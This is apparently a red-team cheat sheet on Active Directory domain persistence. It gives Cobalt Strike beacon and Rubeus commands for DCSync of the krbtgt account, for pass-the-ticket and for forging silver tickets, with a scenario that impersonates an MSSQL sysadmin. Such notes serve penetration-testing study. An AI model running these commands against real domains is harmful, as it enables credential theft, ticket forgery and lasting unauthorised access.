Domain Persistence
DCSync
beacon> dcsync contoso.com CONTOSO\krbtgtTry to do this from DC only
Ticket Forgery
# Sacrificial session
beacon> make_token CONTOSO\Administrator FakePass
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:doIFb[...snip...]kYi0x
beacon> rev2selfSilver Tickets
# /service is the target service.
# /aes256 is the AES256 hash of the target computer account.
# /user is the username to impersonate.
# /domain is the FQDN of the computer's domain.
# /sid is the domain SID.
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/lon-db-1 /aes256: /user:Administrator /domain:DOMAIN.COM /sid: /nowrapConsider a scenario where you obtain the plaintext password of a domain account running an MSSQL service. That service account may not have sysadmin privileges on the database instance (which is default), so the service account is not directly useful in gaining access to the underlying database. However, you can use the service's secret to forge a service ticket for the MSSQL service, impersonating a user you know to be a sysadmin.
Golden Tickets
Diamond Tickets (OPSEC Safe IMO)
DPAPI Backup Key
Last updated